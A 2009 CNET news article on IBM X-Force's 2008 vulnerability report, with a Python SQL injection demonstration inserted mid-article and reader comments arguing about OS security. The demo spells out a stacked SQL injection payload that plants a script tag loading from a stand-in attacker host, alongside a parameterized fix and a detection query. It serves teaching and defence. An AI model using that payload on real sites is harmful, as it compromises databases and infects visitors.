
Majority of vulnerabilities go unpatched, IBM

Elinor Mills, CNET News.com | February 3, 2009 5:05 AM PST

Summary

More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to IBM.
More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to a report released on Monday by IBM's X-Force research group.

Meanwhile, 46 percent of vulnerabilities from 2006 and 44 percent from 2007 still had no patch by the end of 2008, the 2008 X-Force Trend and Risk report said. X-Force documented a record number of 7,406 new vulnerabilities last year.

Overall, Microsoft is the vendor that tops the list in percentage of vulnerabilities disclosed, the report said. The Macintosh and base Linux kernel operating systems have dominated the top spots for vulnerabilities by operating system over the past three years, the report said. There were no breakdowns by vendor or operating system for unpatched vulnerabilities.

Most of the spam last year appeared to come from Russia (12 percent), followed by the U.S. (9.6 percent) and Turkey (7.8 percent), although the spammers themselves may be located elsewhere, the report said.

China unseated the U.S. as the country hosting the largest number of malicious Web sites for the first time last year.

Meanwhile, 46 percent of all malware attacks last year were Trojans targeting people playing online games and doing online banking, and 90 percent of phishing attacks targeted financial institutions, according to the report.

Two main attack trends last year were SQL injection, in which unsanitized input to a Web application is used to alter its database queries, typically to insert references to malicious scripts into the database content that feeds the site's pages, and malicious URLs hosting exploits.
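The mass SQL injection pattern described above, as an added example that is not part of the original article or the IBM report: a small Python/SQLite reproduction of a lookup that concatenates a request parameter into its query, the stacked UPDATE that tags every stored description with a script reference, the parameterized replacement that rejects the same input, and the query an incident responder would run afterwards to find rows that were tagged. The table and column names, the sample rows, the payload, the placeholder URL and the naive statement splitter used to emulate a driver that accepts stacked statements (the MSSQL-backed ASP sites hit in 2008 did; SQLite's execute() does not) are all assumptions made for this example.

```python
import sqlite3

# Constructed sample rows (not from the article); the script URL is a
# placeholder on the reserved .invalid domain, not a real host.
SAMPLE_ROWS = [
    (1, "Widget", "A basic widget."),
    (2, "Gadget", "A fancy gadget."),
    (3, "Gizmo", "A clever gizmo."),
]
INJECTED_TAG = '<script src="http://attacker.invalid/x.js"></script>'

# Payload in the shape of the 2008 mass-injection campaigns: the numeric
# predicate is satisfied with a valid id, then a second statement is stacked
# on that appends the script tag to every row's description.
PAYLOAD = ("1; UPDATE products SET description = description || '"
           + INJECTED_TAG + "'")


def fresh_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products "
                "(id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    con.commit()
    return con


def _run_stacked(con, sql):
    """Emulates a driver that accepts several ';'-separated statements in one
    call (assumption: this stands in for the MSSQL/ASP stacks of 2008). The
    split is naive (no ';' inside string literals) but enough for the demo.
    Returns the rows of the last SELECT executed."""
    rows = []
    for stmt in (s.strip() for s in sql.split(";")):
        if not stmt:
            continue
        cur = con.execute(stmt)
        if stmt.upper().startswith("SELECT"):
            rows = cur.fetchall()
    con.commit()
    return rows


def lookup_vulnerable(con, raw_id):
    """The bug: the request parameter is concatenated into the SQL text, so
    whatever follows the number is parsed and executed as SQL too."""
    rows = _run_stacked(con, "SELECT name FROM products WHERE id = " + raw_id)
    return rows[0] if rows else None


def lookup_hardened(con, raw_id):
    """The fix: validate the type, then bind the value as a parameter so it
    is treated as data and can never be parsed as SQL."""
    try:
        pid = int(raw_id)
    except ValueError:
        return None          # non-numeric id: reject instead of interpolating
    return con.execute("SELECT name FROM products WHERE id = ?",
                       (pid,)).fetchone()


def find_tagged_rows(con):
    """Post-incident check: ids of rows whose stored content now carries a
    script tag, the signature the 2008 campaigns left behind."""
    cur = con.execute("SELECT id FROM products "
                      "WHERE description LIKE '%<script%' ORDER BY id")
    return [row[0] for row in cur]


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable, benign id:", lookup_vulnerable(db, "1"))
    print("vulnerable, payload:  ", lookup_vulnerable(db, PAYLOAD))
    print("rows now carrying <script>:", find_tagged_rows(db))
    db = fresh_db()
    print("hardened, benign id:  ", lookup_hardened(db, "1"))
    print("hardened, payload:    ", lookup_hardened(db, PAYLOAD))
    print("rows carrying <script>:", find_tagged_rows(db))
```

Run it directly to see both paths side by side. The vulnerable lookup still returns the right product for the payload, which is why sites stayed up and the injection went unnoticed; only the tagged descriptions give it away. The hardened lookup returns nothing because int() rejects the input before any SQL is built, and even a value that passed validation would be bound as data rather than parsed as a statement.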

Vendors with the most vulnerabilities disclosed in 2008.

(Credit: IBM X-Force)

The operating systems with the most vulnerability disclosures in 2008.

(Credit: IBM X-Force)

Updated 2:25 p.m. PST to add that report does not list which vendors and operating system platforms had the most unpatched vulnerabilities.

Originally posted as "IBM report: Vulnerabilities still going unpatched" by Elinor Mills on CNET News.com.

Talkback (most recent of 19 comments)

  • There you have it, Apple OS X is the worst OS
    by a *wide* margin when it comes to
    vulnerabilities and security.

    Many people will not believe this, even though
    it has been clear for a long time (hint: try
    finding Vista, OS X and Ubuntu on secunia).

    Vista is the operating system with
    the fewest vulnerabilities, Linux
    (kernel i.e. not any specific distribution) has
    about double that of Vista, OS X has about
    triple that of Vista.

    It may still be true that you are factually
    "safer on a mac" (and Linux) - but it is
    certainly not because the bad guys are short
    on exploitable vulnerabilities on those
    OSes.

    This is the best proof that the relative
    security you have on OS X and Linux is
    only because the lesser market share
    makes it much more interesting to go after
    Windows.

    It also thoroughly debunks the myth that "many
    eyes" review open source OSes and thus they
    inherently let fewer vulns through. Microsoft
    is using the SDL (security development life
    cycle) and paying reviewers and testers
    and accepts longer time-to-market because of
    the inherently more rigid process.

    Add to the above statistics that Vista + 2008
    are also the operating systems with the most
    extra protection mechanisms in place, with the
    most granular access control lists and with the
    most extensive group policies. This means that
    even though a vulnerability was counted in the
    above statistics it is far from certain that it
    was actually exploitable.

    Myth busting statistics indeed.
    honeymonster
    3rd Feb 2009
  • The problem is...
    I agree with you, but the problem is that these kinds of reports will always be dismissed as somehow being flawed, and people will just fall back to the "don't use Windows and security in the same sentence" type garbage.

    What often seems to be ignored is that hackers need only one exploitable vulnerability to unleash an attack. Looking at the vulnerabilities per OS, it is clear that there are many opportunities where there is at least one such vulnerability for each OS.

    Yet, Windows keeps getting targeted the most by far. Maybe when people start putting the logic together they will start seeing that this is purely marketshare driven. What would the logic have been for any hacker to target OS X if they could have gotten 30 times the return by targeting Windows? It is not even a linear scale wrt marketshare. It just doesn't make any sense to target anything other than Windows from a practical point of view, and has nothing to do with available vulnerabilities or difficulty of exploiting it (well, I have a feeling that most hackers have PCs, not Macs).

    All adds up to the end result that Mac and Linux's super low marketshare is protecting them artificially from being viable targets, and their users keep patting themselves on the back because of that reason.

    It's not Teh Secure, it's Teh Low Marketshare, stupid.
    Qbt
    3rd Feb 2009
  • Yes, the marketshare, stupid
    You are correct that a bad guy needs only one
    vuln per OS *in principle*. However, in real
    life not all vulns are created equal. Some are
    more easily exploitable than others, so the bad
    guy needs a *good*, easily exploitable vuln on an
    OS.

    However, all operating systems are also putting
    in more lines of defenses, defense in-depth.
    This may make it significantly harder to
    exploit vulnerabilities. A buffer overflow in
    IE's rendering engine will be significantly
    harder to exploit on a Vista/IE7 than on XP. A
    buffer overflow in Chrome will be significantly
    harder to exploit on Vista than if found in
    Safari on Vista (Chrome also uses "low
    integrity" protected mode on Vista).

    Windows Vista leads the OSes in this sense.
    Chrome/IE7/IE8 used on Vista or '7 raises
    significant barriers for a successful attack.

    As Vista (and '7) are becoming more popular
    (another myth is that Vista's uptake is slower
    than XP) that may well shift the attackers
    focus to other OSes.

    When the green grass of XP fields dries out
    (pun intended), the bad guys are going to look
    for more fertile pastures.

    Nice, juicy Apple OS X is the obvious
    candidate. It has a sizable market share
    approaching 10%, it is by far (3 times Vista!)
    the most vulnerable OS *and* it has limited in-
    depth defense compared to Vista (and even to XP
    SP2+). These are all verifiable facts. On top
    of that OS X has the most gullible users
    (personal opinion).

    I predict that by the end of 2009 we will see
    widespread attacks on OS X. And I also predict
    that it is going to be ugly, really ugly,
    because so many Apple users believe the myth
    that they don't have to worry about malware.
    honeymonster
    3rd Feb 2009
  • RE Busting "Eyes on the code" "myth".
    I don't see where the Linux kernel having a greater volume of vulnerabilities identified/reported busts the "Eyes on the code" "myth" as you suggest. At the worst, this suggests that security analysts and others are more interested in identifying vulnerabilities in released Linux kernel code vs code under testing. I suspect this is just the nature of how they are motivated, and not specific to any OS.

    The problem is no one can prove the ratio of undisclosed to disclosed vulnerabilities for any OS or application. If anything more vulnerabilities disclosed would seem to prove "eyes on the code" is working as advertised. Your real criticism should seem to be with the kernel development/release process itself, not with how well eyes on the code works.
    enduser_z
    3rd Feb 2009
  • No undisclosed vulnerability updates
    The problem is no one can prove the ratio of
    undisclosed to disclosed vulnerabilities for
    any OS or application.

    Oh yes. Today's climate means that at least for
    the OSes being used in the enterprise the
    demand is that *all* patches/updates are being
    justified. A company like MS cannot "slip" an
    update through. Enterprise admins will
    typically carefully review knowledge base
    articles, patch descriptions etc. before
    allowing the OS of a mission critical system to
    be patched. They value predictability and
    stability over patching just anything. If a
    server is locked down with very limited surface
    (behind a firewall/http proxy with no access to
    use a browser from the server) it will
    typically only receive a limited number of the
    patches. Any patch/update inherently carries
    the risk of tipping something over. So, MS and
    others who want to play in the enterprise
    simply *must* demonstrate a truthful and
    complete disclosure of updates/patches.

    I can not tell if you were implying that closed
    source companies are using a "slip it through
    unnoticed" tactic to keep the numbers down. At
    least in MS's case that is simply not possible
    (and would be stupid). They can not patch
    vulnerabilities unnoticed/undisclosed, but they
    could of course try to keep their mouths shut
    about them. But that would only buy them a
    limited amount of time (they will be discovered
    by someone else at some point). And these
    statistics have looked like this for the past 3
    years!

    My point is that being open source does not
    automatically guarantee better quality or fewer
    vulnerabilities. As you say - it is about the
    QA in the development/release process - which
    is orthogonal to being open source. In other
    words - no free lunch - both development
    methodologies will have to put in place
    security vetting processes. I say this only
    because you often see someone claim that open
    source inherently leads to more secure
    software. Which is bull.

    It doesn't inherently lead to worse or more
    vulnerable software either. It has apparently
    less to do with how the software was developed
    and more to do with the QA process put in
    place. And here OS X and the Linux kernel are not
    doing as well as the Microsoft SDL.


    honeymonster
    3rd Feb 2009
  • Not what I meant.
    I wasn't implying that MS is slipping patches through without disclosing the vulnerability, or even that they are aware of vulnerabilities which haven't been disclosed. What I was saying is we only know about disclosed vulnerabilities. This is the classic "you don't know what you don't know" problem. Just because one OS/app has more known vulnerabilities doesn't mean it has more vulnerabilities overall. I'm not making any statement about Linux vs Windows here, just stating a fact. We don't know if Windows has fewer disclosed vulnerabilities because it is in fact better designed (as you posit), or if this is because the "eyes on the code" just happen to be doing a far better job of pointing out flaws in the Linux kernel. Everyone will have an opinion, but by definition you can't prove this. Either way, more disclosed vulnerabilities tends to prove the eyes on the code are working, which is the opposite of what you stated in your original post. This was my only point.
    enduser_z
    3rd Feb 2009
  • Fair points
    But I disagree with this:

    Either way, more disclosed vulnerabilities tends to prove the eyes on the code are working

    That may be so, but not if a software product keeps having more vulnerabilities. If more eyes means more bugs discovered you would expect the bug-pool to dry up at some time. But the statistics have looked like this for 3 years.

    And OS X isn't open source, btw. So closed source holding top and bottom spots. What could possibly be the explanation for that. That more researchers are looking at OS X???
    honeymonster
    3rd Feb 2009
  • bug-pool will never dry up
    "If more eyes means more bugs discovered you would expect the bug-pool to dry up at some time."

    This could only be true (especially with software as complex as an OS kernel) if the development of any new features were stalled totally for years and the only new code in the OS were bug fixes. There will always be a load of new bugs in any complex software that is still being developed.
    robsku
    11th Feb 2009
  • The problem with your theory...
    ...is that it makes little sense. For one there may very well be vulns in MS code that have not yet been discovered because no one but MS can see the code and anyone else must reverse engineer to find them.

    Linux would almost always have more vulns because the source code is open for anyone to find them. That's the whole point. It tickles me when people attempt to make fun of "eyes on code" actually WORKING. People are going to make mistakes. That's inevitable. The point is that anyone can find those mistakes and it appears to be working.

    Now if you want to talk about which system is more secure then you need to look at the extent of damage that can be done by exploiting these vulnerabilities. With Mac and Linux, if the vuln does not include the ability to escalate to root then you know the damage can do no more than what the user under which the exploit is running has permissions to do. And even with root an app can still be made to not do anything outside of its own permission set via SELinux or AppArmor.

    There's a guy that leaves his box open on the internet and gives you root access and asks you to hack his box. He's relying on SELinux and fine tuning it. Would you do that with a Windows box and feel you have any chance of surviving?
    storm14k
    3rd Feb 2009
  • You have a link?
    I am curious more than anything. And you make a valid point with your post as well... funny, how will the answer be spun in relation to your post?
    Linux User 147560
    3rd Feb 2009
  • No problem at all
    For one there may very well be vulns in MS code that have not yet been discovered because no one but MS can see the code

    When reviewing source code only the most trivial bugs are found. No number of eyes looking at source code can replace testing. And unfortunately testers are not so generous with their time as developers are.

    There might be more bugs hiding in closed source - but then again there might not. Statistics from independent entities such as IBM X-Force labs and Secunia suggest that Vista contains far fewer vulnerabilities than other mainstream OSes. It is not like nobody's looking for them. Can you show me anything to suggest that there are more bugs hiding? No? Didn't think so.

    Linux would almost always have more vulns because the source code is open for anyone to find them

    No, Linux has more vulns because security isn't such a big priority (with the myth that it's more secure) and because there's more prestige in getting your features in than there is in contributing work-hours for testing.

    The point is that anyone can find those mistakes and it appears to be working

    No, clearly it is *not* working. They have double the amount of security bugs (a.k.a. vulnerabilities) compared to Vista. Now go and make fun of Vista again.

    With Mac and Linux if the vuln does not include the ability to escalate to root then you know the damage can do no more than the what the user under which the exploit is running has permissions to do.

    That comment completely exposes your lack of knowledge of this issue. Two issues:

    Firstly, it is the same with Vista, and even with XP.

    No, I take that back, Vista actually has *more* protection than OS X and Linux: Unless you switch off UAC (which is on by default) you run under a restricted account without administrative privileges. But when running IE (or Google Chrome) the browser runs under an even more restricted account. That account does not have any rights on the system beyond writing in a secluded and protected cache. Downloaded files *can not* be stored just anywhere. A special broker process (running with normal integrity level) must be asked to reach in and grab the downloaded file and marshal it out. This means that the low integrity process does not inherently have file system rights.

    On OS X and Linux the browser *must* run as the logged-on user to be functional. You can then try to rein it in with AppArmor. If you want to be able to download files with a browser it must inherently have that capability. Not so with Vista/IE7/Chrome.

    And that is completely forgetting the fact that SELinux and AppArmor are a pain in the neck to set up and operate for the average user. So much so that even though OS X has the capability, Apple has completely stayed away from turning it on. Go figure.

    Secondly, while root access is really bad, just running *as you* is almost as bad. It can be leveraged in all sorts of ways. The attacker may modify scripts you usually run, he may take over and infect your running processes, he can combine the attack with a local privilege escalation vuln (of which there have been plenty) etc. This is the same for all OSes and not special to Linux, OS X or Vista. It is a dangerous way to think.

    And we haven't even come to the various other protections, many of which Linux, and especially OS X in its current form, lack: load address randomization, universal no-execute (both heap and stack), heap/stack encryption, wild exception handler protections etc. Vista has them all. These do not prevent vulnerabilities but they may often make it impossible to *exploit* vulnerabilities.

    When I do a ps on my Ubuntu I can see daemons running as root? WTF? On Windows (especially Vista/2008) most daemons run as "local service" or (more commonly) as "network service". Both have just plain user privileges on the box. If you compromise such a process you are very restricted. OTOH if you compromise a root process, it's game over. And as you can see from the above statistics, it is not like there's a lack of exploitable bugs.
    honeymonster
    3rd Feb 2009
  • You got it all upside down
    "No, Linux have more vulns because security isn't such a big priority (with the myth that's its more secure) and because there's more prestige in getting your features in than there is in contributing work-hours for testing."

    How can you, with a serious face, make a claim that security is not a big priority in Linux development and testing? It is one of the two largest ones - the other one being stability (and these two also go hand in hand). *nix systems are secure precisely because security is a top priority. Anything other than that and stability comes after.

    "No, clearly it is *not* working. They have double the amounts of security bugs (a.k.a. vulnerabilities) than Vista. Now go and make fun of Vista again."

    On highly complex projects like an OS a high number of vulns is to be expected. It's the number of vulns found that proves "eyes on code" works and the number of fixes that proves security is a high priority.

    The argument that code being visible to others is good for security is in fact proved by the higher number of *found* vulns than in closed source competitors.
    robsku
    11th Feb 2009
  • RE: Majority of vulnerabilities go unpatched, IBM
    VERY VERY MISLEADING TABLE hahaha
    ZDNET is so unprofessional on this reporting

    see, obviously most of the OS X and OS X Server bugs are
    the same and it's very likely the same bug happens to
    both of the OSes as their sources should be very similar

    and this should happen to some of the Windows bugs as
    well, in that some bugs are affecting several versions of
    the OS

    so to count it by item and make a percentage graph out
    of it is just total nonsense!

    one more thing is that the chart doesn't group the Windows
    OSes into one item so they are way down the list.

    nonsense, nonsense.

    (btw, I have both a mac and a windows machine.)


    cktang
    4th Feb 2009
  • How many OSX and Linux are on the botnets?
    spreading malware, spam, etc.?
    gigogogogown
    4th Feb 2009
  • Microhard instead of Microsoft
    I just want to say Windows is not error-free at all. I have even resorted to buying another system, and Vista, the terror of operating systems, is on my laptop, and that sucks too. What happened to DOS, the good old days?
    Read my blog review for windows story!

    Click on the link below:

    http://www.computersight.com/Operating-Systems/Windows/Where-is-Windows-Trouble-Shooter-1.506633
    Dmobile215
    5th Feb 2009
